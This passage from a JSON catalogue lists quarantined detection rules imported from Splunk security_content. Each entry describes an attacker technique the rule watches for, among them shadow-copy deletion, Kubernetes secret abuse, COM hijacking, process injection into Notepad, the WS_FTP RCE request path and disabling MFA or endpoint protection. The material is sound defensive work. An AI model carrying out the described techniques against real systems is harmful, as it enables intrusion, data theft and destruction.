"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6e0ff70-b122-4227-9368-4cf322ab43c3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/usn_journal_deletion.yml" } }, { "id": "splunk-security-content-b6f45bbc-4ea9-4068-b3bc-0477f6997ae2", "type": "detection", "name": "Kubernetes Abuse of Secret by Unusual User Group", "description": "The following analytic detects unauthorized access or misuse of Kubernetes Secrets by unusual user groups. It leverages Kubernetes Audit logs to identify anomalies in access patterns by analyzing the source of requests and user groups. This activity is significant for a SOC as Kubernetes Secrets store sensitive information like passwords, OAuth tokens, and SSH keys. If confirmed malicious, this behavior could indicate an attacker attempting to exfiltrate or misuse these secrets, potentially leading to unauthorized access to sensitive systems or data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-abuse-of-secret-by-unusual-user-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b6f45bbc-4ea9-4068-b3bc-0477f6997ae2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_abuse_of_secret_by_unusual_user_group.yml" } }, { "id": "splunk-security-content-b71adfcc-155b-11ec-9413-acde48001122", "type": "detection", "name": "PowerShell Get LocalGroup Discovery", "description": "The following analytic identifies the use of the `get-localgroup` command executed via PowerShell or cmd.exe to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant as it may indicate an attacker attempting to gather information about local group memberships, which can be a precursor to privilege escalation. If confirmed malicious, this activity could allow an attacker to identify and target privileged accounts, potentially leading to unauthorized access and control over the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-get-localgroup-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b71adfcc-155b-11ec-9413-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_get_localgroup_discovery.yml" } }, { "id": "splunk-security-content-b71e57e8-c571-4ff1-ae13-bc4384a9e891", "type": "detection", "name": "Cisco Secure Firewall - Intrusion Events by Threat Activity", "description": "This analytic detects intrusion events from known threat activity using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where one or multiple Snort signatures\nassociated with a known threat or threat actor activity have been triggered within a one-hour time window. The detection uses a\nlookup table (cisco_snort_ids_to_threat_mapping) to map Snort signature IDs to known threat actors and their techniques.\nWhen multiple signatures associated with the same threat actor are triggered within the time window, and the count of\nunique signatures matches or exceeds the expected number of signatures for that threat technique, an alert is generated.\nThis helps identify potential coordinated threat activity in your network environment by correlating related intrusion\nevents that occur in close temporal proximity.\n\nCurrently, this detection will alert on the following threat actors or malware families as defined in the cisco_snort_ids_to_threat_mapping lookup:\n\n* AgentTesla\n* Amadey\n* ArcaneDoor\n* AsyncRAT\n* CastleRAT\n* Chafer\n* DCRAT\n* LokiBot\n* Lumma Stealer\n* Nobelium\n* Quasar\n* Remcos\n* Snake\n* Static Tundra\n* Xworm\n\nTo add or update threat actors, update the cisco_snort_ids_to_threat_mapping.csv lookup file with new or modified threat names and associated Snort signature IDs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-intrusion-events-by-threat-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b71e57e8-c571-4ff1-ae13-bc4384a9e891", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___intrusion_events_by_threat_activity.yml" } }, { "id": "splunk-security-content-b7548c2e-9a10-11ec-99e3-acde48001122", "type": "detection", "name": "Windows Modify Show Compress Color And Info Tip Registry", "description": "The following analytic detects suspicious modifications to the Windows registry keys related to file compression color and information tips. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"ShowCompColor\" and \"ShowInfoTip\" values under the \"Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\" path. This activity is significant as it was observed in the Hermetic Wiper malware, indicating potential malicious intent to alter file attributes and user interface elements. If confirmed malicious, this could signify an attempt to manipulate file visibility and deceive users, potentially aiding in further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-show-compress-color-and-info-tip-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7548c2e-9a10-11ec-99e3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml" } }, { "id": "splunk-security-content-b7a045fc-f14a-11eb-8e79-acde48001122", "type": "detection", "name": "Drop IcedID License dat", "description": "The following analytic detects the dropping of a suspicious file named \"license.dat\" in %appdata% or %programdata%. This behavior is associated with the IcedID malware, which uses this file to inject its core bot into other processes for banking credential theft. The detection leverages Sysmon EventCode 11 to monitor file creation events in these directories. This activity is significant as it indicates a potential malware infection aiming to steal sensitive banking information. If confirmed malicious, the attacker could gain unauthorized access to financial data, leading to significant financial loss and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/drop-icedid-license-dat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7a045fc-f14a-11eb-8e79-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/drop_icedid_license_dat.yml" } }, { "id": "splunk-security-content-b7bd83c0-92b5-4fc7-b286-23eccfa2c561", "type": "detection", "name": "Windows COM Hijacking InprocServer32 Modification", "description": "The following analytic detects the modification of the InProcServer32 registry key by reg.exe, indicative of potential COM hijacking. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line execution logs. COM hijacking is significant as it allows adversaries to insert malicious code that executes in place of legitimate software, providing a means for persistence. If confirmed malicious, this activity could enable attackers to execute arbitrary code, disrupt legitimate system components, and maintain long-term access to the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-com-hijacking-inprocserver32-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7bd83c0-92b5-4fc7-b286-23eccfa2c561", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_com_hijacking_inprocserver32_modification.yml" } }, { "id": "splunk-security-content-b7e11721-08b1-4d8b-9628-813bb2380514", "type": "detection", "name": "Wmiprvse LOLBAS Execution Process Spawn", "description": "The following analytic detects `wmiprvse.exe` spawning a LOLBAS execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `wmiprvse.exe` is the parent process and the child process is a known LOLBAS binary. This activity is significant as it may indicate lateral movement or remote code execution by an adversary abusing Windows Management Instrumentation (WMI). If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmiprvse-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b7e11721-08b1-4d8b-9628-813bb2380514", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmiprvse_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-b8003567-c5b6-445b-8966-ecdacc81c24d", "type": "detection", "name": "ESXi SSH Enabled", "description": "This detection identifies SSH being enabled on ESXi hosts, which can be an early indicator of malicious activity. Threat actors often use SSH to gain persistent remote access after compromising credentials or exploiting vulnerabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-ssh-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8003567-c5b6-445b-8966-ecdacc81c24d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_ssh_enabled.yml" } }, { "id": "splunk-security-content-b8340d0f-ba48-4391-bea7-9e793c5aae36", "type": "detection", "name": "Windows Process Injection into Notepad", "description": "The following analytic detects process injection into Notepad.exe using Sysmon EventCode 10. It identifies suspicious GrantedAccess requests (0x40 and 0x1fffff) to Notepad.exe, excluding common system paths like System32, Syswow64, and Program Files. This behavior is often associated with the SliverC2 framework by BishopFox. Monitoring this activity is crucial as it may indicate an initial payload attempting to execute malicious code within Notepad.exe. If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-into-notepad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8340d0f-ba48-4391-bea7-9e793c5aae36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_into_notepad.yml" } }, { "id": "splunk-security-content-b84e8f39-4e7b-4d4f-9e7c-fcd29a227845", "type": "detection", "name": "WS FTP Remote Code Execution", "description": "The following analytic detects potential Remote Code Execution (RCE) attempts exploiting CVE-2023-40044 in WS_FTP software.\nIt identifies HTTP POST requests to the \"/AHT/AhtApiService.asmx/AuthUser\" URL with a status code of 200.\nThis detection leverages the Web datamodel to monitor specific URL patterns and HTTP status codes. This activity is significant as it may indicate an exploitation attempt, potentially allowing an attacker to execute arbitrary code on the server.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ws-ftp-remote-code-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b84e8f39-4e7b-4d4f-9e7c-fcd29a227845", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ws_ftp_remote_code_execution.yml" } }, { "id": "splunk-security-content-b85bbeec-6326-11ec-9311-acde48001122", "type": "detection", "name": "Linux File Created In Kernel Driver Directory", "description": "The following analytic detects the creation of files in the Linux kernel/driver directory. It leverages filesystem data to identify new files in this critical directory. This activity is significant because the kernel/driver directory is typically reserved for kernel modules, and unauthorized file creation here can indicate a rootkit installation. If confirmed malicious, this could allow an attacker to gain high-level privileges, potentially compromising the entire system by executing code at the kernel level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-file-created-in-kernel-driver-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b85bbeec-6326-11ec-9311-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_file_created_in_kernel_driver_directory.yml" } }, { "id": "splunk-security-content-b87b48a8-6d1a-4280-9cf1-16a950dbf901", "type": "detection", "name": "Cisco ASA - Logging Filters Configuration Tampering", "description": "This analytic detects tampering with logging filter configurations on Cisco ASA devices via CLI or ASDM.\nAdversaries may reduce logging levels or disable specific log categories to evade detection, hide their activities, or prevent security monitoring systems from capturing evidence of their actions. By lowering logging verbosity, attackers can operate with reduced visibility to security teams.\nThe detection monitors for logging configuration commands (message ID 111008 or 111010) that modify logging destinations (asdm, console, history, mail, monitor, trap) without setting them to higher severity levels (5-notifications, 6-informational, 7-debugging), which may indicate an attempt to reduce logging verbosity.\nInvestigate unauthorized logging configuration changes that reduce verbosity, especially changes performed by non-administrative accounts, during unusual hours, or without corresponding change management approval.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-filters-configuration-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b87b48a8-6d1a-4280-9cf1-16a950dbf901", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_filters_configuration_tampering.yml" } }, { "id": "splunk-security-content-b89919ed-ee5f-492c-b139-95dbb162039e", "type": "detection", "name": "Deleting Shadow Copies", "description": "The following analytic detects the deletion of shadow copies using the vssadmin.exe or wmic.exe utilities. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because deleting shadow copies is a common tactic used by attackers to prevent recovery and hide their tracks. If confirmed malicious, this action could hinder incident response efforts and allow attackers to maintain persistence and cover their activities, making it crucial for security teams to investigate promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/deleting-shadow-copies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b89919ed-ee5f-492c-b139-95dbb162039e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/deleting_shadow_copies.yml" } }, { "id": "splunk-security-content-b89919ed-fe5f-492c-b139-95dbb162039e", "type": "detection", "name": "Detect Use of cmd exe to Launch Script Interpreters", "description": "The following detects the execution of cscript.exe or wscript.exe processes spawned by cmd.exe, leveraging Endpoint Detection and Response (EDR) telemetry mapped to the Endpoint data model, with additional contextual filtering to improve fidelity and reduce false positives.\nIt focuses on executions originating from user-writable directories such as Users, AppData, Temp, and Downloads, which are commonly abused by attackers to stage and execute malicious scripts, while excluding trusted system paths like C:\\Windows\\System32\\ and C:\\Program Files\\ that are typically associated with legitimate activity.\nThe detection also filters out service accounts (e.g., accounts ending with $ or known naming conventions) to minimize noise from automated processes and incorporates command-line context to better assess script execution patterns and identify potentially suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-use-of-cmd-exe-to-launch-script-interpreters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b89919ed-fe5f-492c-b139-95dbb162039e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml" } }, { "id": "splunk-security-content-b8bccfbf-6ac2-40f2-83b6-e72b7efaa7d4", "type": "detection", "name": "Crowdstrike Admin With Duplicate Password", "description": "The following analytic detects CrowdStrike alerts for admin accounts with duplicate password risk, identifying instances where administrative users share the same password. This practice significantly increases the risk of unauthorized access and potential breaches. Addressing these alerts promptly is crucial for maintaining strong security protocols, ensuring each admin account uses a unique, secure password to protect critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-admin-with-duplicate-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8bccfbf-6ac2-40f2-83b6-e72b7efaa7d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_admin_with_duplicate_password.yml" } }, { "id": "splunk-security-content-b8cbef2c-2cc3-4550-b0fc-9715b7852df9", "type": "detection", "name": "Windows Privileged Group Modification", "description": "This analytic detects modifications to privileged groups in Active Directory, including addition, creation, deletion, and changes to various types of groups such as local, global, universal, and LDAP query groups.\nIt specifically monitors for changes to high-privilege groups like \"Administrators\", \"Domain Admins\", \"Enterprise Admins\", and \"ESX Admins\", among others.\nThis detection is particularly relevant in the context of potential exploitation of vulnerabilities like the VMware ESXi Active Directory Integration Authentication Bypass (CVE-2024-37085), where attackers may attempt to manipulate privileged groups to gain unauthorized access to systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privileged-group-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8cbef2c-2cc3-4550-b0fc-9715b7852df9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privileged_group_modification.yml" } }, { "id": "splunk-security-content-b8f7ed6b-0556-4c84-bffd-839c262b0278", "type": "detection", "name": "Windows Access Token Winlogon Duplicate Handle In Uncommon Path", "description": "The following analytic detects a process attempting to duplicate the handle of winlogon.exe from an uncommon or public source path. This is identified using Sysmon EventCode 10, focusing on processes targeting winlogon.exe with specific access rights and excluding common system paths. This activity is significant because it may indicate an adversary trying to escalate privileges by leveraging the high-privilege tokens associated with winlogon.exe. If confirmed malicious, this could allow the attacker to gain elevated access, potentially leading to full system compromise and persistent control over the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-access-token-winlogon-duplicate-handle-in-uncommon-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8f7ed6b-0556-4c84-bffd-839c262b0278", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_access_token_winlogon_duplicate_handle_in_uncommon_path.yml" } }, { "id": "splunk-security-content-b8f9947e-065a-11ec-aafb-acde48001122", "type": "detection", "name": "Get DomainPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-DomainPolicy` cmdlet, which is used to retrieve password policies in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gather domain policy information, which is crucial for planning further attacks. If confirmed malicious, this could lead to unauthorized access to sensitive domain configurations, aiding in privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b8f9947e-065a-11ec-aafb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-b9bc5513-6fc1-4821-85a3-e1d81e451c83", "type": "detection", "name": "GCP Multi-Factor Authentication Disabled", "description": "The following analytic detects an attempt to disable multi-factor authentication (MFA) for a Google Cloud Platform (GCP) user. It leverages Google Workspace Admin log events, specifically the `UNENROLL_USER_FROM_STRONG_AUTH` command. This activity is significant because disabling MFA can allow an adversary to maintain persistence within the environment using a compromised account without raising suspicion. If confirmed malicious, this action could enable attackers to bypass additional security layers, potentially leading to unauthorized access, data exfiltration, or further exploitation of the compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b9bc5513-6fc1-4821-85a3-e1d81e451c83", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-b9fb8d97-dbc9-4a09-804c-ff0e3862bb2d", "type": "detection", "name": "Windows Rundll32 Apply User Settings Changes", "description": "The following analytic detects the execution of rundll32 with a call to the user32 DLL, specifically the UpdatePerUserSystemParameters function.\nThis function is responsible for updating system parameters, such as desktop backgrounds, display settings, and visual themes.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions.\nThis activity can be significant as it is an uncommon way to apply settings. It was also observed as part of Rhysida Ransomware activity.\nIf confirmed malicious, this could allow an attacker to disguise activities or make unauthorized system changes, potentially leading to persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rundll32-apply-user-settings-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "b9fb8d97-dbc9-4a09-804c-ff0e3862bb2d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_apply_user_settings_changes.yml" } }, { "id": "splunk-security-content-ba24cda8-4716-11ec-8009-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with arguments used to start a process on a remote endpoint via the WinRM protocol, specifically targeting the `Invoke-Command` cmdlet. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process telemetry. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba24cda8-4716-11ec-8009-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_powershell.yml" } }, { "id": "splunk-security-content-ba570b3a-d356-11eb-8358-acde48001122", "type": "detection", "name": "Recursive Delete of Directory In Batch CMD", "description": "The following analytic detects the execution of a batch command designed to recursively delete files or directories, a technique often used by ransomware like Reddot to delete files in the recycle bin and prevent recovery. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific flags for recursive and quiet deletions. This activity is significant as it indicates potential ransomware behavior aimed at data destruction. If confirmed malicious, it could lead to significant data loss and hinder recovery efforts, severely impacting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recursive-delete-of-directory-in-batch-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ba570b3a-d356-11eb-8358-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recursive_delete_of_directory_in_batch_cmd.yml" } }, { "id": "splunk-security-content-ba6e7f4d-a85e-4a14-8e7d-41f4b82e3c9a", "type": "detection", "name": "Windows Cisco Secure Endpoint Uninstall Immunet Service Via Sfc", "description": "The following analytic detects the use of the sfc.exe utility with the \"-u\" parameter, which is part of the Cisco Secure Endpoint installation. The \"-u\" flag allows the uninstallation of Cisco Secure Endpoint components. This detection leverages endpoint telemetry to monitor command-line executions that include the \"-u\" parameter. The use of this flag is significant as it could indicate an attempt to disable or remove endpoint protection, potentially leaving the system vulnerable to further exploitation. If identified as malicious, this action may be part of a broader effort to disable security mechanisms and avoid detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 